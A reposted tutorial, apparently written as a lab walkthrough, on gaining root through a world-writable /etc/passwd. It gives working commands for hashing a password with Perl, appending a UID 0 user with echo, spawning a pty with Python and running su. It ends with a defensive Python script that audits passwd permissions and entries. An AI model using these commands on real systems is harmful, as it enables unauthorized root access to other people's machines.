2025-04-06 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/02 Report--
This article is about how privileges can be escalated on Linux through a writable /etc/passwd file. The editor thinks it is very practical, so I share it with you to learn from. I hope you get something out of reading it. Let's take a look.
In a Windows environment, administrators or members of the administrators group have higher privileges, and these highly privileged users are the primary targets of attackers. Similarly, users with root or sudo privileges in a Linux environment will be primarily targeted by attackers.
We will discuss an example of privilege escalation caused by a file permission misconfiguration. Usually, during a CTF challenge, we always want to look at the passwd file to see which users exist on the system.
The passwd file lives in the /etc directory under the Linux root. Most importantly, the file can also be read by non-privileged users.
/etc/passwd
Each user in a Linux system has a corresponding record line in the /etc/passwd file, which records some basic attributes of the user. This file is readable by all users. It is a colon-separated file that contains the following information, in order:
User name
Encrypted password
User ID (or UID)
Group ID (or GID)
User's full name
User home directory
Login shell
Now, we will look at the /etc/passwd file:
Let's take a closer look at the "/etc/passwd" file, taking the root user as an example:
root: user name.
x: placeholder for the user's password. The password itself is read from the "/etc/shadow" file.
0: root user UID.
0: root user GID.
root: the user description field.
/root: the user's home directory. This is the directory the user is placed in when a terminal session starts.
/bin/bash: the user's shell. Depending on the user's purpose, this is the shell that is spawned when the user logs in.
Environment settings
The two Linux systems run as VMs, are configured as follows, and use NAT network mode (which shares the IP address of the host).
| OS Name | Role | OS Version | Machine IP | Kernel Version |
|---|---|---|---|---|
| Kali Linux (x64 bit) | attacker machine | Kali | 192.168.245.134 | 4.12.0-kali2-686 |
| Ubuntu (x64 bit) | vulnerable machine | Ubuntu 14.04.6 LTS | 192.168.245.146 | 4.4.0-142-generic |
We assume that access as the hacknpentest user on the target system has already been obtained from the attacker's machine (Kali). Now, we will upload the linuxprivchecker.py Python script to look for possible misconfigurations on the target system.
We use wget (or web get) to download the file to the target server.
By default, Python is installed on all Linux machines. We will run the enumeration script using the following command.
python linuxprivchecker.py
Taking a closer look at the script output, we find that the passwd file is world-writable, with read, write and modify permissions for ordinary users.
This permission misconfiguration can be abused to elevate the current user's privileges to root. Now we will try to write to the passwd file to make ourselves a root user.
We will add a user to the passwd file and explicitly give the encrypted password in the corresponding field. You can use Perl to generate a salted, encrypted password as follows:
$ perl -le 'print crypt("THIS_IS_Original_PASSWORD", "SALT")'
The following command adds a user with an encrypted password, and with UID and GID set to root's value [0], to the passwd file.
echo "Tom:Encrypted_Password:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
Let's break down the fields we want to add to the passwd file.
Tom: user name
ad7t5uIalqMws: the user's encrypted password
0: root user ID
0: root group ID
User_like_root: user description
/root: user's home directory
/bin/bash: user's shell
The '>>' operator redirects output to a file and appends it at the end of that file (in this case, the /etc/passwd file).
Generate an encrypted password:
perl -le 'print crypt("Password@973", "addedsalt")'
The above command generates a hash with the following password and salt:
Original password: Password@973
Salt: addedsalt
Encrypted password: ad7t5uIalqMws
Using the encrypted password above, we now append the following to the /etc/passwd file.
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
The Tom user has been successfully appended to the /etc/passwd file.
cat /etc/passwd
Now, using the su command, we will try to log in as the Tom user.
su must be run from a terminal, but we do not have a suitable terminal. We will move to a bash shell with a terminal using the following Python one-liner (Python is already installed on the target server):
python -c 'import pty; pty.spawn("/bin/bash")'
Now, let's try to log in as the Tom user using the following command:
su - Tom
Great! You can see that our user privileges have been escalated to root!
Summary
We found an error in the permissions configuration in the passwd file, and finally took advantage of this to upgrade our user rights to root. In the next article, we will discuss other ways to elevate Linux privileges.
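Seen from the defender's side, the walkthrough depends on two conditions that can be checked directly: /etc/passwd being writable by non-root users, and an entry other than root carrying UID 0 with its own hash in the password field. The audit below is an added example, not part of the original article or of linuxprivchecker.py; the function names and the sample data (built from the entries shown above) are constructed for illustration.

```python
import os
import stat

def audit_passwd_text(text):
    """Return (user, finding) tuples for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, passwd, uid = fields[0], fields[1], int(fields[2])
        if uid == 0 and name != "root":
            findings.append((name, "UID 0 account other than root"))
        if passwd == "":
            findings.append((name, "empty password field"))
        elif passwd != "x" and not passwd.startswith(("*", "!")):
            # A real hash here bypasses /etc/shadow entirely.
            findings.append((name, "password hash stored in passwd"))
    return findings

def audit_mode(mode):
    """Flag write permission for anyone other than the file owner."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    return findings

def audit_file(path="/etc/passwd"):
    """Audit permissions and contents of a passwd-format file."""
    with open(path) as fh:
        return audit_mode(os.stat(path).st_mode), audit_passwd_text(fh.read())

# Constructed sample: a normal passwd file plus the entry added in the article.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hacknpentest:x:1000:1000::/home/hacknpentest:/bin/bash
Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash
"""

if __name__ == "__main__":
    for who, what in audit_passwd_text(SAMPLE):
        print(who, "->", what)
    print(audit_mode(0o100666))  # mode of a world-writable regular file
```

On a correctly configured system, audit_file() returns two empty lists: /etc/passwd is mode 0644 owned by root, and every password field is a placeholder.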
The above is how privilege escalation on Linux can be achieved through a writable /etc/passwd file. The editor believes it contains knowledge points that we may see or use in our daily work. I hope you can learn more from this article.